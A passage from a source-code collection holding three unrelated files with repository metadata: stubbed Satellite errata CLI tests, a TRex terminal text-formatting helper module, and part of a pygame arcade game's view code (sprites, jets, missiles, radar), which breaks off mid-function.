@Steps:
1. erratum list --order 'issued ASC'
2. erratum list --order 'issued DESC'
@Assert: Errata is sorted by Issued date.
@Status: Manual
"""
@stubbed()
def test_errata_list_sort_2(self):
"""@Test: Filter errata by org id and sort by updated date
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --organization-id=<orgid> --order 'updated ASC'
2. erratum list --organization-id=<orgid> --order 'updated DESC'
@Assert: Errata is filtered by org id and sorted by updated date.
@Status: Manual
"""
@stubbed()
def test_errata_list_sort_3(self):
"""@Test: Filter errata by org name and sort by updated date
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --organization=<org name> --order 'updated ASC'
2. erratum list --organization=<org name> --order 'updated DESC'
@Assert: Errata is filtered by org name and sorted by updated date.
@Status: Manual
"""
@stubbed()
def test_errata_list_sort_4(self):
"""@Test: Filter errata by org label and sort by updated date
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --organization-label=<org_label> --order 'updated ASC'
2. erratum list --organization-label=<org_label> --order 'updated DESC'
@Assert: Errata is filtered by org label and sorted by updated date.
@Status: Manual
"""
@stubbed()
def test_errata_list_sort_5(self):
"""@Test: Filter errata by org id and sort by issued date
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --organization-id=<org_id> --order 'issued ASC'
2. erratum list --organization-id=<org_id> --order 'issued DESC'
@Assert: Errata is filtered by org id and sorted by issued date.
@Status: Manual
"""
@stubbed()
def test_errata_list_sort_6(self):
"""@Test: Filter errata by org name and sort by issued date
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --organization=<org_name> --order 'issued ASC'
2. erratum list --organization=<org_name> --order 'issued DESC'
@Assert: Errata is filtered by org name and sorted by issued date.
@Status: Manual
"""
@stubbed()
def test_errata_list_sort_7(self):
"""@Test: Filter errata by org label and sort by issued date
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --organization-label=<org_label> --order 'issued ASC'
2. erratum list --organization-label=<org_label> --order 'issued DESC'
@Assert: Errata is filtered by org label and sorted by issued date.
@Status: Manual
"""
@stubbed()
def test_errata_list_1(self):
"""@Test: Filter errata by product id
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --product-id=<productid>
@Assert: Errata is filtered by product id.
@Status: Manual
"""
@stubbed()
def test_errata_list_2(self):
"""@Test: Filter errata by product name
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --product=<productname>
@Assert: Errata is filtered by product name.
@Status: Manual
"""
@stubbed()
def test_errata_list_3(self):
"""@Test: Filter errata by product id and Org id
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --product-id=<product_id> --organization-id=<org_id>
@Assert: Errata is filtered by product id and Org id.
@Status: Manual
"""
@stubbed()
def test_errata_list_4(self):
"""@Test: Filter errata by product id and Org name
@Feature: Errata
@Setup: errata synced on satellite server.
@Steps:
1. erratum list --product-id=<product_id> --organization=<org_name>
@Assert: Errata is filtered by product id and Org name.
@Status: Manual
"""
@stubbed()
def test_errata_list_5(self):
"""@Test: Filter errata by product id
@Feature: Errata
@Setup: errata synced on satellite server.
@Steps:
1. erratum list --product-id=<productid>
2. erratum list --product-id=<product_id> --organization-id=<org_id>
3. erratum list --product-id=<product_id> --organization=<org_name>
4. erratum list --product-id=<product_id>
--organization-label=<org_label>
@Assert: Errata is filtered by product id.
@Status: Manual
"""
@stubbed()
def test_errata_list_6(self):
"""@Test: Filter errata by product name
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --product=<productname>
@Assert: Errata is filtered by product name.
@Status: Manual
"""
@stubbed()
def test_errata_list_7(self):
"""@Test: Filter errata by product name and Org id
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --product=<product_name> --organization-id=<org_id>
@Assert: Errata is filtered by product name and Org id.
@Status: Manual
"""
@stubbed()
def test_errata_list_8(self):
"""@Test: Filter errata by product name and Org name
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --product=<product_name> --organization=<org_name>
@Assert: Errata is filtered by product name and Org name.
@Status: Manual
"""
@stubbed()
def test_errata_list_9(self):
"""@Test: Filter errata by product name and Org label
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --product=<product_name>
--organization-label=<org_label>
@Assert: Errata is filtered by product name and Org label.
@Status: Manual
"""
@stubbed()
def test_errata_list_10(self):
"""@Test: Filter errata by Org id
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --organization-id=<orgid>
@Assert: Errata is filtered by Org id.
@Status: Manual
"""
@stubbed()
def test_errata_list_11(self):
"""@Test: Filter errata by Org name
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --organization=<org name>
@Assert: Errata is filtered by Org name.
@Status: Manual
"""
@stubbed()
def test_errata_list_12(self):
"""@Test: Filter errata by Org label
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --organization-label=<org_label>
@Assert: Errata is filtered by Org label.
@Status: Manual
"""
@stubbed()
def test_errata_list_13(self):
"""@Test: Filter errata by CVE
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --cve <cve_id>
@Assert: Errata is filtered by CVE.
@Status: Manual
"""
@stubbed()
def test_errata_list_permission_1(self):
"""@Test: Show errata only if the User has permissions to view them
@Feature: Errata
@Setup:
1. Create two products with one repo each. Sync them.
2. Make sure that they both have errata.
3. Create a user with view access on one product and not on the other.
@Steps:
1. erratum list --organization-id=<orgid>
@Assert: Check that the new user is able to see errata for one
product only.
@Status: Manual
"""
@stubbed()
def test_errata_systems_list_1(self):
"""@Test: View a list of affected content hosts for an erratum
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. content-host list --erratum-id=<erratum_id>
--organization-id=<org_id>
@Assert: List of affected content hosts for an erratum is displayed.
@Status: Manual
"""
@stubbed()
def test_errata_systems_list_2(self):
"""@Test: View a list of affected content hosts for an erratum filtered
with restrict flags
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. content-host list --erratum-id=<erratum_id>
--organization-id=<org_id> --erratum-restrict-available=1
2. content-host list --erratum-id=<erratum_id>
--organization-id=<org_id> --erratum-restrict-unavailable=1
3. content-host list --erratum-id=<erratum_id>
--organization-id=<org_id> --erratum-restrict-available=0
4. content-host list --erratum-id=<erratum_id>
--organization-id=<org_id> --erratum-restrict-unavailable=0
@Assert: List of affected content hosts for an erratum is displayed
filtered with corresponding restrict flags.
@Status: Manual
"""
@stubbed()
def test_errata_content_host_1(self):
"""@Test: Available errata count displayed while viewing a list of
Content hosts
@Feature: Errata
@Setup:
1. Errata synced on satellite server.
2. Some content hosts present.
@Steps:
1. hammer content-host list --organization-id=<orgid>
@Assert: The available errata count is retrieved.
@Status: Manual
"""
| gpl-3.0 | 3,391,724,014,069,024,000 | 21.465693 | 79 | 0.584248 | false | 3.796004 | true | false | false |
zverevalexei/trex-http-proxy | trex_client/stf/trex_stf_lib/text_opts.py | 4 | 5153 | import json
import re
TEXT_CODES = {'bold': {'start': '\x1b[1m',
'end': '\x1b[22m'},
'cyan': {'start': '\x1b[36m',
'end': '\x1b[39m'},
'blue': {'start': '\x1b[34m',
'end': '\x1b[39m'},
'red': {'start': '\x1b[31m',
'end': '\x1b[39m'},
'magenta': {'start': '\x1b[35m',
'end': '\x1b[39m'},
'green': {'start': '\x1b[32m',
'end': '\x1b[39m'},
'yellow': {'start': '\x1b[33m',
'end': '\x1b[39m'},
'underline': {'start': '\x1b[4m',
'end': '\x1b[24m'}}
class TextCodesStripper:
keys = [re.escape(v['start']) for k,v in TEXT_CODES.iteritems()]
keys += [re.escape(v['end']) for k,v in TEXT_CODES.iteritems()]
pattern = re.compile("|".join(keys))
@staticmethod
def strip (s):
return re.sub(TextCodesStripper.pattern, '', s)
def format_num (size, suffix = "", compact = True, opts = ()):
txt = "NaN"
if type(size) == str:
return "N/A"
u = ''
if compact:
for unit in ['','K','M','G','T','P']:
if abs(size) < 1000.0:
u = unit
break
size /= 1000.0
if isinstance(size, float):
txt = "%3.2f" % (size)
else:
txt = "{:,}".format(size)
if u or suffix:
txt += " {:}{:}".format(u, suffix)
if isinstance(opts, tuple):
return format_text(txt, *opts)
else:
return format_text(txt, (opts))
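# Illustrative examples (assuming the defaults above):
#   format_num(1234567, suffix='bps') -> '1.23 Mbps'
#   format_num(999)                   -> '999'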
def format_time (t_sec):
if t_sec < 0:
return "infinite"
if t_sec < 1:
# low numbers
for unit in ['ms', 'usec', 'ns']:
t_sec *= 1000.0
if t_sec >= 1.0:
return '{:,.2f} [{:}]'.format(t_sec, unit)
return "NaN"
else:
# seconds
if t_sec < 60.0:
return '{:,.2f} [{:}]'.format(t_sec, 'sec')
# minutes
t_sec /= 60.0
if t_sec < 60.0:
return '{:,.2f} [{:}]'.format(t_sec, 'minutes')
# hours
t_sec /= 60.0
if t_sec < 24.0:
return '{:,.2f} [{:}]'.format(t_sec, 'hours')
# days
t_sec /= 24.0
return '{:,.2f} [{:}]'.format(t_sec, 'days')
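# Illustrative examples:
#   format_time(0.002) -> '2.00 [ms]'
#   format_time(90)    -> '1.50 [minutes]'
#   format_time(-1)    -> 'infinite'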
def format_percentage (size):
return "%0.2f %%" % (size)
def bold(text):
return text_attribute(text, 'bold')
def cyan(text):
return text_attribute(text, 'cyan')
def blue(text):
return text_attribute(text, 'blue')
def red(text):
return text_attribute(text, 'red')
def magenta(text):
return text_attribute(text, 'magenta')
def green(text):
return text_attribute(text, 'green')
def yellow(text):
return text_attribute(text, 'yellow')
def underline(text):
return text_attribute(text, 'underline')
def text_attribute(text, attribute):
if isinstance(text, str):
return "{start}{txt}{stop}".format(start=TEXT_CODES[attribute]['start'],
txt=text,
stop=TEXT_CODES[attribute]['end'])
elif isinstance(text, unicode):
return u"{start}{txt}{stop}".format(start=TEXT_CODES[attribute]['start'],
txt=text,
stop=TEXT_CODES[attribute]['end'])
else:
raise Exception("not a string")
FUNC_DICT = {'blue': blue,
'bold': bold,
'green': green,
'yellow': yellow,
'cyan': cyan,
'magenta': magenta,
'underline': underline,
'red': red}
def format_text(text, *args):
return_string = text
for i in args:
func = FUNC_DICT.get(i)
if func:
return_string = func(return_string)
return return_string
def format_threshold (value, red_zone, green_zone):
if value >= red_zone[0] and value <= red_zone[1]:
return format_text("{0}".format(value), 'red')
if value >= green_zone[0] and value <= green_zone[1]:
return format_text("{0}".format(value), 'green')
return "{0}".format(value)
# pretty print for JSON
def pretty_json (json_str, use_colors = True):
pretty_str = json.dumps(json.loads(json_str), indent = 4, separators=(',', ': '), sort_keys = True)
if not use_colors:
return pretty_str
try:
# int numbers
pretty_str = re.sub(r'([ ]*:[ ]+)(\-?[1-9][0-9]*[^.])',r'\1{0}'.format(blue(r'\2')), pretty_str)
# float
pretty_str = re.sub(r'([ ]*:[ ]+)(\-?[1-9][0-9]*\.[0-9]+)',r'\1{0}'.format(magenta(r'\2')), pretty_str)
        # strings
pretty_str = re.sub(r'([ ]*:[ ]+)("[^"]*")',r'\1{0}'.format(red(r'\2')), pretty_str)
pretty_str = re.sub(r"('[^']*')", r'{0}\1{1}'.format(TEXT_CODES['magenta']['start'],
TEXT_CODES['red']['start']), pretty_str)
except :
pass
return pretty_str
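# Illustrative example: pretty_json('{"b": 2, "a": 1}') returns the string
# re-indented (4 spaces) with keys sorted and numeric values colorized;
# pass use_colors=False to get the plain re-indented dump.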
if __name__ == "__main__":
pass
| mit | -12,226,227,152,173,916 | 25.838542 | 111 | 0.465554 | false | 3.396836 | false | false | false |
wesleywerner/conspire | src/view.py | 1 | 31498 | import os
import textwrap
import random
import pygame
from pygame.locals import *
from const import *
FRAMERATE = 30
CANVAS_SIZE = (600, 600)
TEXT = (124, 164, 128)
BORDER = (64, 80, 116)
TRANSPARENT = (255, 0, 255)
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
GREEN = (0, 220, 0)
BLUE = (0, 0, 220)
PURPLE = (220, 0, 220)
# parts definition for source image rect
PARTS_RECT = {
'human torso': (16,35,39,104),
'human head': (20,0,32,37),
'human right arm': (0,47,18,81),
'human left arm': (53,47,18,81),
'human right leg': (12,130,20,69),
'human left leg': (39,130,20,69),
'alien torso': (92,35,39,102),
'alien head': (96,0,32,37),
'alien right arm': (76,47,18,81),
'alien left arm': (129,47,18,81),
'alien right leg': (88,130,20,69),
'alien left leg': (115,130,20,69),
'trex torso': (242,51,92,117),
'trex head': (174,123,56,72),
'trex tail': (160,0,131,46),
'trex legs': (168,53,66,63),
'cyclops torso': (371,60,43,65),
'cyclops skull': (379,0,48,59),
'cyclops right arm': (334,43,35,74),
'cyclops left arm': (416,61,35,48),
'cyclops right leg': (358,127,26,63),
'cyclops left leg': (402,127,31,61),
'ptreodactyl torso': (543,58,50,87),
'ptreodactyl skull': (543,0,72,58),
'ptreodactyl right wing': (453,19,90,147),
'ptreodactyl left wing': (615,0,54,150),
'tax returns': (677,0,75,100),
'shopping list': (677,0,75,100),
'todo list': (677,0,75,100),
'ludum dare comments': (677,0,75,100),
'bank accounts': (677,0,75,100),
'website passwords': (677,0,75,100),
'IP address scamlist': (677,0,75,100),
'codex page I': (677,0,75,100),
'codex page II': (677,0,75,100),
'codex page III': (677,0,75,100),
'codex page IV': (677,0,75,100),
'codex page V': (677,0,75,100),
'codex page VI': (677,0,75,100),
'biblical references': (677,0,75,100),
'book of psalms': (677,0,75,100),
'book of tomas': (677,0,75,100),
}
UFO_RECT = (6,6,88,88)
FIGHTER_RECT = (113,12,74,75)
LIGHTFIGHTER_RECT = (313,12,74,75)
MISSILE_RECT = (194,12,4,28)
RADAR_RECT = (210,10,80,80)
RADAR_HOSTILE_RECT = (245,3,4,4)
RADAR_GOAL_RECT = (250,3,4,4)
GREEN_ZONE_RECT = (400, 19, 100,52)
class DraggableSprite(pygame.sprite.Sprite):
def __init__(self, name, image, rect):
pygame.sprite.Sprite.__init__(self)
self.name = name
self.image = image
self.rect = rect
class AFOSprite(pygame.sprite.Sprite):
"""
Player controller Air Force One sprite.
"""
def __init__(self, image):
pygame.sprite.Sprite.__init__(self)
self.name = 'AFO'
self.original_image = image
self.image = image
self.rect = image.get_rect()
self.fly_region = 0
self.speed = [0, 0]
self.autopilot = True
self.health = 10
def _accelerate(self, x, y):
self.speed = [self.speed[0] + x, self.speed[1] + y]
if self.speed[0] < -10:
self.speed[0] = -10
if self.speed[1] < -10:
self.speed[1] = -10
if self.speed[0] > 10:
self.speed[0] = 10
if self.speed[1] > 10:
self.speed[1] = 10
def _clamp(self):
if self.rect.left < 10:
self.rect.left = 10
if self.rect.top < 10:
self.rect.top = 10
if self.rect.right > CANVAS_SIZE[0] - 10:
self.rect.right = CANVAS_SIZE[0] - 10
if self.rect.top > self.fly_region:
self.rect.top = self.fly_region
def update(self):
"""
        Update the player-controlled craft.
"""
# auto move the UFO forward until we are in the top half of the screen
if self.rect.top > self.fly_region:
self.rect.top -= 6
if self.rect.top < self.fly_region:
self.autopilot = False
pressed = pygame.key.get_pressed()
lose_acceleration = True
if not self.autopilot and self.health > 0:
if pressed[K_LEFT] or pressed[K_a]:
self._accelerate(-1, 0)
lose_acceleration = False
if pressed[K_RIGHT] or pressed[K_d]:
self._accelerate(1, 0)
lose_acceleration = False
if pressed[K_UP] or pressed[K_w]:
self._accelerate(0, -1)
lose_acceleration = False
if pressed[K_DOWN] or pressed[K_s]:
self._accelerate(0, 1)
lose_acceleration = False
if pressed[K_F10]:
self.health = 0
self._clamp()
self.rect.left += self.speed[0]
self.rect.top += self.speed[1]
if lose_acceleration:
if self.speed[0] > 0:
self.speed[0] -= 1
elif self.speed[0] < 0:
self.speed[0] += 1
if self.speed[1] > 0:
self.speed[1] -= 1
elif self.speed[1] < 0:
self.speed[1] += 1
def take_damage(self):
self.health -= random.randint(1, 3)
if self.health < 0:
self.health = 0
class UFOSprite(AFOSprite):
"""
Behaves like the base sprite and adds rotation.
"""
def __init__(self, image):
AFOSprite.__init__(self, image)
self.angle = 0
def update(self):
AFOSprite.update(self)
self.angle = (self.angle + 10) % 360
self.image = pygame.transform.rotate(self.original_image, self.angle)
self.rect = self.image.get_rect(center=self.rect.center)
class FighterJetSprite(pygame.sprite.Sprite):
def __init__(self, image, target):
pygame.sprite.Sprite.__init__(self)
self.name = 'Fighter Jet'
self.image = image
self.rect = image.get_rect()
self.target = target
self.reload_time = 0
self.movement = 0
self.fly_region = CANVAS_SIZE[1] / 1.5
        self.movement_speed = random.randint(10, 30)
self.autopilot = True
self.exitpilot = False
self._firing = False
def _clamp(self):
if self.rect.left < 10:
self.rect.left = 10
if self.rect.top > CANVAS_SIZE[1] - 100:
self.rect.top = CANVAS_SIZE[1] - 100
if self.rect.right > CANVAS_SIZE[0] - 10:
self.rect.right = CANVAS_SIZE[0] - 10
if self.rect.top < self.fly_region:
self.rect.top = self.fly_region
def update(self):
if self.autopilot:
self.rect.top -= 4
if self.rect.bottom < CANVAS_SIZE[1] - 100:
self.autopilot = False
elif self.exitpilot:
if self.rect.top < CANVAS_SIZE[1]:
self.rect.left += 2
self.rect.top += 2
else:
# move inline with target and fire when ready and able.
diff = self.target.rect.left - self.rect.left
if abs(diff) > self.movement_speed:
self.rect.left += diff / self.movement_speed
if self.reload_time > 0:
self.reload_time -= 1
elif abs(diff) < 100:
print('Fire!')
self._firing = True
self.reload_time = 45
if random.randint(1, 100) < 5:
self.movement = -1
elif random.randint(1, 100) < 5:
self.movement = 1
elif random.randint(1, 100) < 5:
self.movement = 0
self.rect.top += self.movement * 4
self._clamp()
self.exitpilot = self.target.health == 0
@property
def is_firing(self):
if self._firing:
self._firing = False
return True
else:
return False
class MissileSprite(pygame.sprite.Sprite):
def __init__(self, image):
pygame.sprite.Sprite.__init__(self)
self.name = 'Missile'
self.image = image
self.rect = image.get_rect()
self.destroy = False
def update(self):
self.rect.top -= 10
if self.rect.bottom < 0:
self.destroy = True
class ExplosionSprite(pygame.sprite.Sprite):
small_size = (57, 57)
large_size = (89, 89)
small_rects = (
(1,185),(61,185),(121,185),(181,185),(241,185),
(1,245),(61,245),(121,245),(181,245),(241,245),
)
large_rects = (
        (1,1),(93,1),(185,1),(277,1),(369,1),
(1,93),(93,93),(185,93),(277,93),(369,93),
)
def __init__(self, sprites, is_small=True):
pygame.sprite.Sprite.__init__(self)
self.sprites = sprites
self.animation_index = 0
self.destroy = False
self.image = None
self.is_small = is_small
self._set_sprite()
self.rect = self.image.get_rect()
def _set_sprite(self):
if self.is_small:
self.image = self.sprites.subsurface(self.small_rects[self.animation_index], self.small_size)
else:
self.image = self.sprites.subsurface(self.large_rects[self.animation_index], self.large_size)
def update(self):
self._set_sprite()
self.animation_index += 1
self.destroy = self.animation_index >= 10
class View(object):
def __init__(self, pixel_width, pixel_height, model):
# we may observe the model
self.model = model
# listen for model events
model.register_listener(self.model_event)
# calculate each block size, and set our viewport size.
self.screen_size = (pixel_width, pixel_height)
# init pygame
pygame.init()
pygame.display.set_caption('Conspiracy-101')
self.screen = pygame.display.set_mode(self.screen_size)
self.clock = pygame.time.Clock()
# draw game sprites to a surface of a fixed size
# which we can rescale when blitting to the screen
self.canvas = pygame.Surface(CANVAS_SIZE).convert()
self.canvas.set_colorkey(TRANSPARENT)
# calculate the scale size by the canvas/screen height ratio.
        # since the canvas is square its width and height are always equal,
        # but we calculate both anyway to be good citizens.
self.scale_ratio = self.screen_size[1] / float(CANVAS_SIZE[1])
print('scale ratio is %s' % (self.scale_ratio,))
self.scale_size = (
int(CANVAS_SIZE[0] * self.scale_ratio), self.screen_size[1])
self.scale_center = ((self.screen_size[0] - self.scale_size[0]) / 2,
(self.screen_size[1] - self.scale_size[1]) / 2)
print('scale center is %s' % (self.scale_center,))
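        # Worked example (illustrative): a 600x600 canvas shown in a
        # 1200x900 window gives scale_ratio 1.5, scale_size (900, 900)
        # and scale_center (150, 0), i.e. the canvas is centered horizontally.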
# background image storage
self.background = self.canvas.copy()
self.load_background()
self.scrolling_background_yoffset = 0
# scenario description
self.brief_offset = 0
self.brief_sprite = None
self.results_sprite = None
self.tactical_info_sprite = None
# sprite sheets
self.parts_sprite_sheet = pygame.image.load(os.path.join('..', 'data', 'parts.png')).convert()
self.parts_sprite_sheet.set_colorkey(TRANSPARENT)
self.player_craft_sheet = pygame.image.load(os.path.join('..', 'data', 'ufo-sprites.png')).convert()
self.player_craft_sheet.set_colorkey(TRANSPARENT)
self.explosion_sprite_sheet = pygame.image.load(os.path.join('..', 'data', 'explosion3.png')).convert()
self.explosion_sprite_sheet.set_colorkey(TRANSPARENT)
# sprite storage
self.dragging_sprite = None
self.drag_offset = None
self.sprites = []
# font storage
self.font = pygame.font.Font(os.path.join('..', 'data', 'emulogic.ttf'), 12)
self.smallfont = pygame.font.Font(os.path.join('..', 'data', 'emulogic.ttf'), 10)
# confirm dialog
self.confirm_image = pygame.image.load(os.path.join('..', 'data', 'confirm-dialog.png')).convert()
self.confirm_action = None
# agent images
self.agent_image = pygame.image.load(os.path.join('..', 'data', 'agent.png')).convert()
# player objects
self.player_craft = None
# delay exit state
self.exit_counter = None
# music
pygame.mixer.music.load(os.path.join('..', 'data', 'kbmonkey-mission_control.xm'))
pygame.mixer.music.play(-1)
def load_background(self):
"""
Load a background depending on the game state.
"""
if self.model.state == STATE_MENU:
self.background = pygame.image.load(os.path.join('..', 'data', 'menu-screen.png')).convert()
if self.model.state == STATE_BUILD:
self.background = pygame.image.load(os.path.join('..', 'data', 'build-screen.png')).convert()
if self.model.state in (STATE_UFO, STATE_FLIGHT):
self.background = pygame.image.load(os.path.join('..', 'data', 'ufo-screen.png')).convert()
if self.model.state == STATE_RESULTS:
self.background = pygame.image.load(os.path.join('..', 'data', 'results-screen.png')).convert()
if self.model.state == STATE_END:
self.background = pygame.image.load(os.path.join('..', 'data', 'end-screen.png')).convert()
def load_build_sprites(self):
"""
Load sprites depending on the game state.
"""
self.sprites = []
parts = self.model.builder.get_level_parts()
print('level %s parts are %s' % (self.model.level, parts))
for part in parts:
            part_rect = PARTS_RECT.get(part)
            if part_rect:
                rect = pygame.Rect(part_rect)
image = self.parts_sprite_sheet.subsurface(rect)
rect.center = (random.randint(30, 570), random.randint(230, 370))
if self.model.builder.part_used(part):
rect.center = (random.randint(30, 570), random.randint(430, 570))
sprite = DraggableSprite(part, image, rect)
self.sprites.append(sprite)
else:
print('warning: part "%s" has no image rect definition' % (part,))
def load_player_craft_sprites(self):
self.sprites = []
# player craft
player = None
# start off at the bottom center of the screen
if self.model.state == STATE_UFO:
player = UFOSprite(self.player_craft_sheet.subsurface(UFO_RECT))
elif self.model.state == STATE_FLIGHT:
player = AFOSprite(self.player_craft_sheet.subsurface(LIGHTFIGHTER_RECT))
if player:
player.fly_region = CANVAS_SIZE[1] / 2
player.rect.center = (CANVAS_SIZE[0] / 2, CANVAS_SIZE[1])
self.sprites.append(player)
self.player_craft = player
def add_fighter_jet(self):
"""
Add a fighter jet to the play field.
"""
if self.player_craft:
jet = FighterJetSprite(
self.player_craft_sheet.subsurface(FIGHTER_RECT),
self.player_craft)
jet.rect.top = CANVAS_SIZE[1]
jet.rect.left = random.randint(100, 400)
self.sprites.append(jet)
def fire_jet_missile(self, jet):
"""
Fire a missile from a jet.
"""
missile = MissileSprite(
self.player_craft_sheet.subsurface(MISSILE_RECT))
missile.rect.center = jet.rect.center
missile.rect.left += (26 * random.randint(-1, 1))
self.sprites.append(missile)
def create_explosion(self, target, is_small=True):
"""
        Create an explosion near the target (a sprite object).
"""
explosion = ExplosionSprite(self.explosion_sprite_sheet, is_small)
explosion.rect.center = target.rect.center
self.sprites.append(explosion)
def draw_hover_part_name(self):
"""
Return the part name under the cursor.
"""
if not self.confirm_action:
xy = self.translated_mousepos
for sprite in self.sprites:
if sprite.rect.collidepoint(xy):
part_name = self.font.render(
sprite.name, False, BLACK, TRANSPARENT)
part_name.set_colorkey(TRANSPARENT)
if part_name:
self.canvas.blit(part_name, (13, 370))
return
def draw_body_accuracy(self):
"""
Return the part name under the cursor.
"""
pass
#part_name = self.font.render(
#'accuracy: %s %%' % (self.model.builder.accuracy, ),
#False, BLACK, TRANSPARENT)
#part_name.set_colorkey(TRANSPARENT)
#if part_name:
#self.canvas.blit(part_name, (13, 420))
def blit(self):
"""
Draw the model state to our game canvas, and finally blit it
to the screen after we rescale it.
"""
garbage_sprites = []
self.canvas.blit(self.background, (0, 0))
if self.model.state != STATE_MENU and self.exit_counter > 0:
self.exit_counter -= 1
if self.model.state == STATE_BUILD:
# dragging a sprite
if self.dragging_sprite:
self.dragging_sprite.rect.center = (
self.translated_mousepos[0] - self.drag_offset[0],
self.translated_mousepos[1] - self.drag_offset[1],
)
# briefing words
if self.brief_sprite:
self.canvas.blit(self.brief_sprite.image,
(14, 22),
self.brief_sprite.rect.move(0, self.brief_offset))
# draw sprites
for sprite in self.sprites:
sprite.update()
self.canvas.blit(sprite.image, sprite.rect)
self.draw_hover_part_name()
self.draw_body_accuracy()
elif self.model.state in (STATE_UFO, STATE_FLIGHT):
bh = self.background.get_height()
self.scrolling_background_yoffset += 15
if self.scrolling_background_yoffset > bh:
self.scrolling_background_yoffset = 0
self.canvas.blit(self.background, (0, self.scrolling_background_yoffset))
self.canvas.blit(self.background, (0, self.scrolling_background_yoffset - bh))
# radar
self.draw_tactical_radar()
# health bar
self.draw_ufo_healthbar()
# help words
self.draw_ufo_help()
# exit
if self.exit_counter == 0:
self.model.mission_success = self.model.ufotactical.distance_from_goal < 10
self.model.set_state(STATE_RESULTS)
# draw sprites
for sprite in self.sprites:
sprite.update()
self.canvas.blit(sprite.image, sprite.rect)
if isinstance(sprite, FighterJetSprite):
if sprite.is_firing:
self.fire_jet_missile(sprite)
elif isinstance(sprite, MissileSprite):
if self.player_craft.health > 0:
if self.player_craft.rect.colliderect(sprite.rect):
# TODO hit sound and explosion
garbage_sprites.append(sprite)
self.player_craft.take_damage()
if self.player_craft.health > 0:
self.create_explosion(sprite, is_small=True)
else:
self.create_explosion(sprite, is_small=False)
elif isinstance(sprite, AFOSprite):
if self.player_craft.health == 0 and not self.exit_counter:
self.exit_counter = 100
garbage_sprites.append(sprite)
elif isinstance(sprite, ExplosionSprite):
if sprite.destroy:
garbage_sprites.append(sprite)
elif self.model.state == STATE_RESULTS:
# report!
if self.results_sprite:
self.canvas.blit(self.results_sprite, (111, 100))
if self.model.state != STATE_MENU:
# garbage
for g in garbage_sprites:
if g in self.sprites:
self.sprites.remove(g)
# confirm
if self.confirm_action:
csize = self.canvas.get_size()
size = pygame.Rect((0, 0), self.confirm_image.get_size())
size.center = (csize[0] / 2, csize[1] / 2)
self.canvas.blit(self.confirm_image, size)
# rescale
if self.scale_ratio > 1.0:
self.screen.blit(
pygame.transform.scale(self.canvas, self.scale_size),
self.scale_center)
else:
self.screen.blit(self.canvas, (0, 0))
# flip and tick
pygame.display.flip()
self.clock.tick(FRAMERATE)
def draw_tactical_radar(self):
# base image
self.canvas.blit(
self.player_craft_sheet.subsurface(RADAR_RECT),
(10, 10))
# enemy fighters
incoming_jets = self.model.ufotactical.jet_distances
for enemy in incoming_jets:
# draw a dot for its distance.
epos = (
50,
45 + ((enemy / 500.0) * 40)
)
self.canvas.blit(
self.player_craft_sheet.subsurface(RADAR_HOSTILE_RECT),
epos)
# dot for goal distance
epos = (
50,
50 - ((self.model.ufotactical.distance_from_goal / 2000.0) * 40)
)
self.canvas.blit(
self.player_craft_sheet.subsurface(RADAR_GOAL_RECT),
epos)
# green zone
if self.model.ufotactical.distance_from_goal == 0:
self.canvas.blit(self.player_craft_sheet.subsurface(GREEN_ZONE_RECT), (10, 120))
def draw_ufo_help(self):
if self.model.state in (STATE_UFO, STATE_FLIGHT):
# for the first few ticks
if self.model.ufotactical.clock < 250: #250
# show some helpful words of wisdom
if self.tactical_info_sprite:
self.canvas.blit(self.tactical_info_sprite, (220, 40))
# draw the agent picture
self.canvas.blit(self.agent_image, (10, 10))
def draw_ufo_healthbar(self):
hp = self.player_craft.health * 8 + 1
fullrect = pygame.Rect(10, 100, 80, 10)
rect = pygame.Rect(10, 100, hp, 10)
pygame.draw.rect(self.canvas, RED, fullrect, 0)
pygame.draw.rect(self.canvas, GREEN, rect, 0)
pygame.draw.rect(self.canvas, BLACK, fullrect, 2)
def print_wrapped_text(self, sentence, maxlength, font, color):
"""
Creates an image with the given words wrapped.
"""
lines = []
paragraphs = sentence.split('\n')
for p in paragraphs:
lines.extend(textwrap.wrap(p, maxlength))
lines.append(' ')
surfii = []
max_width = 0
total_height = 0
for line in lines:
surfii.append(font.render(line, False, color, TRANSPARENT))
print_size = surfii[-1].get_size()
if print_size[0] > max_width:
max_width = print_size[0]
total_height += print_size[1]
combined = pygame.Surface((max_width, total_height))
combined.fill(TRANSPARENT)
print_position = 0
for print_surface in surfii:
combined.blit(print_surface, (0, print_position))
print_position += print_surface.get_height()
combined.set_colorkey(TRANSPARENT)
return combined
def draw_briefing_words(self):
"""
Redraw the briefing wording.
"""
if self.model.state == STATE_BUILD:
BRIEF_TEXT_HEIGHT = 150
brief_text = LEVEL_SCENARIOS[self.model.level]
if self.model.level > 1:
if self.model.mission_success:
brief_text = 'My commendations on your last ' \
'mission, what a success!\n' + brief_text
else:
brief_text = 'Failure like your last mission will ' \
'not be tolerated. Let us hope your next ' \
'mission goes better...\n' + brief_text
sprite = pygame.sprite.Sprite()
image = self.print_wrapped_text(
brief_text,
30,
self.font,
TEXT
)
sprite.image = image
sprite.rect = pygame.Rect((0, 0), (image.get_width(), BRIEF_TEXT_HEIGHT))
self.brief_sprite = sprite
elif self.model.state in (STATE_UFO, STATE_FLIGHT):
